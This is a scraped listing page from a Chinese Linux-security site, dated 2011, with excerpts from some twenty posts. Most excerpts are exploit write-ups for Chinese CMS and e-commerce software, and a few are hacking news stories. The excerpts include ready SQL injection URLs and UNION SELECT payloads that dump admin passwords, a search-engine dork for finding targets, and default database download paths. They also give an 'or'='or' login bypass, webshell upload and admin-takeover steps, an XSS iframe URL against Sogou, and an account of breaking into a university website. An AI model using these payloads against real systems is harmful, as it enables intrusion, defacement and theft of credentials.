Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

搜索:
您的位置: Linux安全网 > Linux安全 >
  • Linux安全# 儋州市黑客入侵知名网站致损百万元
  • 日期:2011-07-22 点击:199家住儋州水井村的“80后”曾某(1989年9月出生)多次通过互联网,非法进入总 部在北京的国内一家知名网站,篡改该网站的客户信息,造成该网站经济损失 102万余元。7月5日,在儋州市公安局东风派出所的协助下,北京警方将曾某抓获。 据了解,从今年1月起,总部
  • Linux安全# Discuz! X2最新注入漏洞EXP
  • 日期:2011-07-22 点击:235昨天乌云公布出来Discuz! X2的 0day ,但是没公布利用方法。今天俺拿到了,分享给大家。 而且是直接暴管理员用户和密码的EXP: http://www. tmdsb .com/forum.php?mod=attachmentfindpost=ssaid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KH
  • Linux安全# 黑客攻击致基地组织网络致其通信瘫痪
  • 日期:2011-07-22 点击:202据美国媒体6月29日报道,国际反恐专家表示,一批 黑客 日前发动了针对基地组织 的网络通信的攻击,导致该组织无法在网络 上传 播讯息,干扰了他们的视频和公告发布。 “基地组织网络通信已暂时陷入瘫痪,他们目前没有任何一个可以信赖的渠道发布信息, ”负
  • Linux安全# 突破WAF防火墙的SQL LOG备份工具
  • 日期:2011-07-22 点击:202程序说明: 功能:LOG备份一句话(密码:a),支持选择POST提交方式或GET提交, 可选择数字型和字符型,可自动获取数据库名。 运行环境:已经在WIN7+.NET+4.0环境下测试过。C#编写的WPF应用程序,需要.NET3.5以上才能运行。。。 BY:T00LS 点击下载:GetWebSh
  • Linux安全# 卓讯EmteEasySite漏洞+拿webshell方法
  • 日期:2011-07-22 点击:196卓讯智能化网站管理系统 EmteEasySite 官网:http://www.emte.com.cn/ 百度搜:技术支持:卓讯科技 直接进后台看版权是不是EmteEasy系统 /main/login.asp 漏洞 利用: 默认数据库地址可下载 /db/%23EMTE^@DATEBASE.MDB 下载后直接打开看AdminUser表 看列AName2
  • Linux安全# php168 获取管理员0day
  • 日期:2011-07-22 点击:204php168 获取管理员0day 1.注册普通用户 2.通过 /member/buygroup.php?job=buygid=3 购买管理员权限 。 进入后台 功能中心---模版设置----增加系统模版页 保存php不成功的话 试试其他的后缀,例如txt成功了 保存为 .php;1.txt 同理。。。
  • Linux安全# DVBBS8.0以上版本后台提升webshell
  • 日期:2011-07-22 点击:193转载请著名出处,char's blog 如果服务器支持PHP,那么,在版块设置里面对某某版块设置上传格式里面增加php,可以传成功。上传地址在后台文件管理处查看。 这次这个后台提权漏洞是上个星期无意中发现的。 1、登录后台,风格界面-模板导出在附加说明处写入一
  • Linux安全# Bird CMS 注射漏洞
  • 日期:2011-07-22 点击:193Bird CMS管理系统,记得1.1爆了万能密码的漏洞!不知道最新版本的有什么洞子没有!大致的下了套源码看了看,网站管理和程序员都懒了! //默认数据库 data\data#bird$.mdb //漏洞文件 product.asp 貌似都没有任何防注入的,张开双腿等人日啊! //表段data_admin
  • Linux安全# Phpcms 2008 yp/job.php脚本SQL盲注漏洞
  • 日期:2011-07-22 点击:210影响版本: Phpcms 2008 漏洞描述: Phpcms网站管理系统是国内主流CMS系统之一 Phpcms所使用的yp/job.php脚本的urldecode函数没有正确地过滤用户所提交的$genre参数便在SQL查询中使用,远程攻击者可以通过提交恶意请求执行SQL注入攻击。以下是有漏洞的PHP代码
  • Linux安全# 风渡科技ASP网上购物系统0905-1 多文件存在注入漏洞
  • 日期:2011-07-22 点击:196风渡科技ASP网上购物系统0905-1 多文件存在注入漏洞, 涉及文件:pro_show.asp,new.asp等。 程序介绍: 这是一套完全免费的商城系统,由风渡网络科技有限公司按公司于2009年3月独立开发完成,09年5月15日正式对外发布,本系统免费,系统内的所有功能均是开
  • Linux安全# 检测武汉地质大学
  • 日期:2011-07-22 点击:200xiaowei'blog www.xiaoweio.cn 1.GG踩点后发现很多漏洞 2用'or'='or' 进了个后台,通过编辑器拿下shell 其中的编辑器是通过其他站的讯实系统cookies 直接跨目录找到数据库登录的, 这其中有俩EWB 一个用来找目录 一个用来拿shell,讯实当然可以拿shell了,但是
  • Linux安全# 鼎峰企业智能建站系统搜索注入漏洞
  • 日期:2011-07-22 点击:197发布日期:2010-04-18 发布作者:莫ㄨ问 影响版本:鼎峰企业智能建站系统ASP版 V0.3.6 漏洞描述: 昨天利用这个系统拿了一个webshell,但是是利用下载默认数据库的,后面发现者这套系统界面搞得还不错,就顺便看下它的安全性了。本文就其搜索注入漏洞简单分
  • Linux安全# Shopv8商城系统 v10.48 漏洞
  • 日期:2011-07-22 点击:196Shopv8商城系统 v10.48 漏洞 发布作者:Lan3a 影响版本: Shopv8商城系统 v10.48 漏洞描述: pinglun.asp页面存在SQL注入 Author:Lan3a 后台:pinglun.asp这个文件。 代码如下: %dim bookid,action pinglunid=request.QueryString(id) 直接提交 action=requ
  • Linux安全# Pars Design CMS 漏洞
  • 日期:2011-07-22 点击:195################################################################# # Securitylab.ir ################################################################# # Application Info: # Name: pars Design # Vendor: http://Parsdata.com ####################
  • Linux安全# 搜狗跨站漏洞
  • 日期:2011-07-22 点击:199http://bbs.sogou.com/search/say.jsp?query=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.xiaoweio.cn%3E%3C%2Fiframe%3Er=kw=04000000sid = 输入ie 看看是不是打开我的网站了 ..
  • Linux安全# ECSHOP商城系统 漏洞
  • 日期:2011-07-22 点击:199ECSHOP商城系统category页面过滤不严导致SQL注入漏洞 影响版本: ECShop V2.7.2 UTF8_Release0505 漏洞分析:文件 category.php $filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0'; //52行 $filter_attr = empty($f
  • Linux安全# 建和网络系统SQL注入漏洞暴管理密码
  • 日期:2011-07-22 点击:195建和网络系统SQL注入漏洞暴管理密码 搜索关键字:inurl:news-content.asp?articleid 利用语句:%20union%20select%201,2,3,4,5,6,7,username,password, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20admin 一般后台:admin 官方地址: http
  • Linux安全# 无忧购物系统cookies注入oday漏洞
  • 日期:2011-07-22 点击:195无忧购物系统cookies注入oday漏洞 发布日期:2010-04-18 发布作者:流浪的风 影响版本:未知 漏洞描述: 其实代码中出现了多处SQLintection,但是在Conn.asp中: Set Conn = Nothing Response.Write 数据库连接出错 Response.End End If % !--#include file=
  • Linux安全# BBSGood论坛程序SQL注入漏洞
  • 日期:2011-07-22 点击:201BBSGood论坛程序indexlabel.asp和labelsave.asp页面存在SQL注入漏洞 在文件indexlabel.asp中: sql=select top 1 Admin,UserName,Password from bbsgood _Admin where UserName='Request.Cookies(bbsinfoadminuser)' //第115行 Set rs = Server.CreateObject
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史